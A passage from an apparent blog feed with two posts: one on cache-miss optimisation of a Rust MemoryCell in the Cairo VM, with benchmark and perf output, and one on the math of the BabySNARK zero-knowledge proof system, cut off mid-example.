&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; using the `BigUint` implementation, since those force allocations on the heap, but since that&amp;#39;s&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; dropped in later versions anyway it&amp;#39;s not a priority. For Lambdaworks, the new copies are mostly&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; to the stack, which is typically already in the cache.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; The layout uses the 4 MSB in the first `u64` as flags:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; - BIT63: NONE flag, 1 when the cell is actually empty.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; - BIT62: ACCESS flag, 1 when the cell has been accessed in a way observable to Cairo.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; - BIT61: RELOCATABLE flag, 1 when the contained value is a `Relocatable`, 0 when it is a&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; `Felt252`.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; `Felt252` values are stored in big-endian order to keep the flag bits free.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; `Relocatable` values are stored as native endian, with the 3rd word storing the segment index&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F;&#x2F; and the 4th word storing the offset.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;#[repr(align(32))]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub(crate) struct MemoryCell([u64; 4]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
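The flag layout documented in those comments can be sketched like this; the helper names are illustrative (not the cairo-vm crate’s API), the three flags sit in the top bits of the first u64 word as described, and bit tests use integer division and modulo for clarity:

```python
# Sketch of the MemoryCell flag layout described above (illustrative only).
BIT63 = 2 ** 63   # NONE flag: the cell is empty
BIT62 = 2 ** 62   # ACCESS flag: the cell was observably accessed
BIT61 = 2 ** 61   # RELOCATABLE flag: the value is a Relocatable, not a Felt252

def pack_none():
    return [BIT63, 0, 0, 0]

def pack_relocatable(segment, offset, accessed=False):
    # Word 0 carries the flags; words 2 and 3 carry segment index and offset.
    w0 = BIT61 + (BIT62 if accessed else 0)
    return [w0, 0, segment, offset]

def is_none(cell):
    return (cell[0] // BIT63) % 2 == 1

def is_accessed(cell):
    return (cell[0] // BIT62) % 2 == 1

def is_relocatable(cell):
    return (cell[0] // BIT61) % 2 == 1

def unpack_relocatable(cell):
    return (cell[2], cell[3])
```

Packing everything into four words keeps each cell at 32 bytes, which is what lets two cells share a 64-byte cache line without straddling a boundary.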
&lt;p&gt;After this change, when we re-execute some old Sepolia testnet blocks, we can see that the new cache-friendly &lt;code&gt;MemoryCell&lt;&#x2F;code&gt; scales better when using hyper-threading, outperforming both the old &lt;code&gt;MemoryCell&lt;&#x2F;code&gt; with a &lt;code&gt;BigUint&lt;&#x2F;code&gt;-backed Felt and our previous implementation of the &lt;code&gt;MemoryCell&lt;&#x2F;code&gt; with the &lt;code&gt;Lambdaworks&lt;&#x2F;code&gt; felt.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;HkqL06d0a.png&quot; alt=&quot;benchs_x86 (2)&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Benchmarks run on AMD Ryzen 9 5950X 16-Core Processor, Architecture:x86, CPU(s): 32&lt;&#x2F;p&gt;
&lt;p&gt;That figure was generated from data gathered by running hyperfine, a CLI-based benchmarking tool, with different numbers of threads, so we can see how each change performs as the thread count increases.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running benchmark for 1 threads&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 1: re_execute_main threads: 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        57.351 s               [User: 55.107 s, System: 2.174 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 2: re_execute_fixed_felt threads: 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        44.760 s               [User: 42.510 s, System: 2.197 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 3: re_execute_main_lambdaworks threads: 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        47.458 s               [User: 45.454 s, System: 1.948 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Summary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  re_execute_fixed_felt threads: 1 ran&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.06 times faster than re_execute_main_lambdaworks threads: 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.28 times faster than re_execute_main threads: 1&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running benchmark for 2 threads&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 1: re_execute_main threads: 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        28.247 s               [User: 54.708 s, System: 1.647 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 2: re_execute_fixed_felt threads: 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        21.625 s               [User: 41.931 s, System: 1.231 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 3: re_execute_main_lambdaworks threads: 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        23.607 s               [User: 45.111 s, System: 1.987 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Summary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  re_execute_fixed_felt threads: 2 ran&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.09 times faster than re_execute_main_lambdaworks threads: 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.31 times faster than re_execute_main threads: 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running benchmark for 4 threads&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 1: re_execute_main threads: 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        14.718 s               [User: 56.848 s, System: 1.445 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 2: re_execute_fixed_felt threads: 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        11.516 s               [User: 44.374 s, System: 1.264 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 3: re_execute_main_lambdaworks threads: 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):        12.472 s               [User: 47.662 s, System: 1.627 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Summary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  re_execute_fixed_felt threads: 4 ran&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.08 times faster than re_execute_main_lambdaworks threads: 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.28 times faster than re_execute_main threads: 4&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running benchmark for 8 threads&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 1: re_execute_main threads: 8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         7.904 s               [User: 61.202 s, System: 0.705 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 2: re_execute_fixed_felt threads: 8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         6.186 s               [User: 47.780 s, System: 0.771 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 3: re_execute_main_lambdaworks threads: 8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         6.800 s               [User: 52.407 s, System: 0.947 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Summary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  re_execute_fixed_felt threads: 8 ran&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.10 times faster than re_execute_main_lambdaworks threads: 8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.28 times faster than re_execute_main threads: 8&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running benchmark for 16 threads&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 1: re_execute_main threads: 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         5.248 s               [User: 77.844 s, System: 1.159 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 2: re_execute_fixed_felt threads: 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         4.443 s               [User: 65.118 s, System: 1.575 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 3: re_execute_main_lambdaworks threads: 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         5.456 s               [User: 80.535 s, System: 1.852 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Summary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  re_execute_fixed_felt threads: 16 ran&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.18 times faster than re_execute_main threads: 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.23 times faster than re_execute_main_lambdaworks threads: 16&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Running benchmark for 32 threads&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 1: re_execute_main threads: 32&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         5.967 s               [User: 168.953 s, System: 3.411 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 2: re_execute_fixed_felt threads: 32&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         5.345 s               [User: 149.728 s, System: 4.033 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Benchmark 3: re_execute_main_lambdaworks threads: 32&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  Time (abs ≡):         7.010 s               [User: 199.011 s, System: 5.984 s]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Summary&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;  re_execute_fixed_felt threads: 32 ran&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.12 times faster than re_execute_main threads: 32&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.31 times faster than re_execute_main_lambdaworks threads: 32&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1.32 times faster than re_execute_main_lambdaworks threads: 48&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;We also ran &lt;code&gt;perf stat&lt;&#x2F;code&gt; to check the cache misses with this new version, and it is indeed more cache efficient: 21% fewer cache misses than the old MemoryCell implementation with Lambdaworks, and 9% fewer than the one with BigInts.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;$ perf stat -e cache-misses .&#x2F;binaries&#x2F;re_execute_fixed_felt sepolia-testnet_0.11.0_47191.sqlite 47000 47191&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt; Performance counter stats for &amp;#39;.&#x2F;binaries&#x2F;re_execute_fixed_felt sepolia-testnet_0.11.0_47191.sqlite 47000 47191&amp;#39;:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        1906296012      cache-misses&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       5.278474869 seconds time elapsed&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     148.647511000 seconds user&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;       4.168127000 seconds sys&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;arm-architecture-considerations&quot;&gt;&lt;strong&gt;ARM Architecture Considerations&lt;&#x2F;strong&gt;&lt;&#x2F;h3&gt;
&lt;p&gt;While we have seen a cache-miss-related performance regression in multi-threaded environments on x86_64 architectures, this issue does not show up on systems with ARM CPUs. Our benchmarks, conducted on a MacBook M3 Pro with 18 GB of RAM and 11 cores, show a different performance profile.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;external&#x2F;S1tUaVi0p.png&quot; alt=&quot;benchs_mac_2 (1)&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In the image, you can notice that:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;In an SMT context, the ARM-based system displays superior scalability when using the lambdaworks-based MemoryCell struct instead of the BigInt implementation.&lt;&#x2F;li&gt;
&lt;li&gt;The MemoryCell modifications don’t impact the execution performance on ARM systems.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;This difference in performance between ARM and more traditional x86_64 processors (such as those from Intel or AMD) can be attributed to architectural differences in cache management and to larger cache lines (128 bytes on Apple Silicon processors). These ARM designs give each core dedicated cache resources, which avoids the cache contention that arises when two cores compete for the same cache lines, a situation that can lead to increased cache misses.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;So all is well and nice, but two questions remain: Why didn’t we see this before, and how do we ensure we see it in the future? How can we improve our engineering processes by considering what we learned?&lt;&#x2F;p&gt;
&lt;p&gt;Our benchmarks modeled a workload without the necessary concurrency to surface the issue.&lt;&#x2F;p&gt;
&lt;p&gt;To get a performance regression test, we need code that triggers the issue under the right circumstances: a minimal version of &lt;code&gt;re_execute&lt;&#x2F;code&gt; that lets us vary parameters to cover a broader area of the problem space (number of VMs running in parallel, number of threads, number of processors used, processor architecture, and so on).&lt;&#x2F;p&gt;
&lt;p&gt;Two lessons learned (or rather, reinforced) are:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Don’t assume your code will only run under specific workloads. Try to model the real world as much as possible and measure to make sure.&lt;&#x2F;li&gt;
&lt;li&gt;Don’t assume that a change to the code that shows a performance improvement measured “locally” will positively impact the overall performance of the entire program.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;This experience highlights that achieving maximum performance in Rust often requires consideration of lower-level details beyond merely using enums. It underscores the importance of understanding and optimizing CPU cache behavior in performance-sensitive applications.&lt;&#x2F;p&gt;
&lt;p&gt;By rethinking our approach to data storage and access and getting a little creative with our structures, we’ve reduced cache misses and significantly improved the scaling of our VMs on multicore systems.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Implementing BabySNARK in lambdaworks in our internal bootcamp</title>
          <pubDate>Wed, 28 Feb 2024 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/implementing-babysnark-in-our-internal-bootcamp/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/implementing-babysnark-in-our-internal-bootcamp/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/implementing-babysnark-in-our-internal-bootcamp/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;We started with an internal bootcamp two weeks ago to onboard new engineers to our team. We wanted to give the basic building blocks in cryptography and also an introduction to zero-knowledge proofs (ZKP) using &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&quot;&gt;lambdaworks&lt;&#x2F;a&gt;. Zero-knowledge proofs are a powerful technology that could &lt;a href=&quot;&#x2F;transforming-the-future-with-zero-knowledge-proofs-fully-homomorphic-encryption-and-new-distributed-systems-algorithms&#x2F;&quot;&gt;shape the future in many different ways&lt;&#x2F;a&gt;. For an introduction and a bit of history on the topic, see our &lt;a href=&quot;&#x2F;our-highly-subjective-view-on-the-history-of-zero-knowledge-proofs&#x2F;&quot;&gt;previous blog post&lt;&#x2F;a&gt;. Modern proof systems use several tricks and optimizations for increased performance. However, this complicates the learning process since we have to separate the main logic (arithmetization, interpolation, imposing constraints, committing to polynomials) from improvements, some of which are difficult to grasp. We focused on a more straightforward construction, following &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;initc3&#x2F;babySNARK&#x2F;blob&#x2F;master&#x2F;babysnark.py&quot;&gt;BabySNARK&lt;&#x2F;a&gt;. During the first week, we covered the basics of finite fields, notions of groups, elliptic curves, hash functions, signatures, public key encryption, and symmetric key encryption schemes. If you are unfamiliar with some topics, we recommend you read our &lt;a href=&quot;&#x2F;math-survival-kit-for-developers&#x2F;&quot;&gt;math survival kit&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;This blog post will explain the working principle of the proof system and its implementation using lambdaworks (you can check the work in progress &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;lambdaclass&#x2F;lambdaworks&#x2F;tree&#x2F;babysnark&#x2F;examples&#x2F;baby-snark&#x2F;src&quot;&gt;here&lt;&#x2F;a&gt;). We hope this will help onboard new people to the fantastic field of ZKP.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;working-principle&quot;&gt;Working principle&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;programs-as-relationships-between-polynomials&quot;&gt;Programs as relationships between polynomials&lt;&#x2F;h3&gt;
&lt;p&gt;BabySNARK is based on this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2014&#x2F;718&quot;&gt;NIZK&lt;&#x2F;a&gt; proposed in 2014. It works with square span programs, which are similar to, yet simpler than, quadratic arithmetic programs (used in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2013&#x2F;279&quot;&gt;Pinocchio&lt;&#x2F;a&gt;). The representation of the circuit is done with a matrix $U$ (belonging to $F^{m \times n}$) and a vector $z = (1 , u , w)^t$ (containing the instance $u$ and witness $w$),&lt;br &#x2F;&gt;
$(U.z) \circ (U.z) = \mathbf{1}$, where $\circ$ denotes the component-wise (Hadamard) product and $\mathbf{1}$ is the all-ones vector.&lt;&#x2F;p&gt;
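&lt;p&gt;As a toy illustration of ours (not part of BabySNARK’s code), the square span condition can be checked directly over a small prime field. The single row below is the standard booleanity gadget, $(2b - 1)^2 = 1$, which holds exactly when $b \in \{0, 1\}$:&lt;&#x2F;p&gt;

```python
# Toy square span program check (ours): verify (U z) o (U z) = 1 over F_17,
# where "o" is the component-wise product.
p = 17

def ssp_holds(U, z):
    # every row i must satisfy (sum_j U[i][j] * z[j])^2 = 1 (mod p)
    return all(pow(sum(uij * zj for uij, zj in zip(row, z)) % p, 2, p) == 1
               for row in U)

# Booleanity gadget: the row (-1, 2) against z = (1, b) gives 2b - 1, and
# (2b - 1)^2 = 1 holds exactly when b is 0 or 1.
U = [[p - 1, 2]]
assert ssp_holds(U, [1, 0])
assert ssp_holds(U, [1, 1])
assert not ssp_holds(U, [1, 2])   # b = 2 violates the constraint
```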
&lt;p&gt;We can express any boolean circuit using these types of constraints. Let us rewrite the equations in a different form that will be convenient for later purposes:&lt;br &#x2F;&gt;
$\left(\sum_j u_{ij} z_j \right)^2 = 1$&lt;br &#x2F;&gt;
which should be valid for every $i = 0, 1, 2, …$. We can encode these equations using polynomials. Suppose that $m = 2^k$ for some $k$ and that we are working with a nice field $F$ containing a subgroup $D_i$ of size $2^k$. We can take $\omega$ as an $m$-th primitive root of unity ($\omega$ generates the whole subgroup) and find the polynomials $U_j (x)$ which satisfy&lt;br &#x2F;&gt;
$U_j (\omega^i ) = u_{ij}$&lt;br &#x2F;&gt;
By doing this, we are encoding our equations as relations over polynomials. Thus, we can replace the problem equivalently,&lt;br &#x2F;&gt;
$\left(\sum_j U_{j} (x) z_j \right)^2 - 1 = p(x)$&lt;br &#x2F;&gt;
If we evaluate the polynomials at $\omega^i$, then we get $U_j (\omega^i ) = u_{ij}$, and $p(\omega^i )$ evaluates to $0$ at every $\omega^i$. A theorem says that if $\omega^i$ is a root&#x2F;zero of a polynomial $p(x)$, then $x - \omega^i$ divides $p(x)$. In other words, there is some $q (x)$ such that $p(x) = (x - \omega^i )q(x)$.&lt;&#x2F;p&gt;
&lt;p&gt;If the polynomial has multiple zeros, then it must be divisible by each $x - \omega^i$. Let us define $Z(x)$ as the vanishing polynomial over $D_i$&lt;br &#x2F;&gt;
$Z(x) = \prod_j (x -\omega^j ) = x^m - 1$&lt;br &#x2F;&gt;
where we used in the last equality that $\omega$ is a primitive $m$-th root of unity (this trick is also used in &lt;a href=&quot;&#x2F;diving-deep-fri&#x2F;&quot;&gt;STARKs&lt;&#x2F;a&gt;). Therefore, if all the constraints hold, we have a polynomial $q(x)$ which fulfills this equality&lt;br &#x2F;&gt;
$p(x) = Z(x) q(x)$&lt;&#x2F;p&gt;
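&lt;p&gt;The encoding step above can be sketched in a few lines (a toy example of ours over $F_{17}$ with $m = 4$, not production code): interpolate $V(x) = \sum_j z_j U_j(x)$ over the powers of $\omega$, form $p(x) = V(x)^2 - 1$, and check that it reduces to zero modulo $x^m - 1$:&lt;&#x2F;p&gt;

```python
# Toy example (ours): encode four satisfied square span constraints as a
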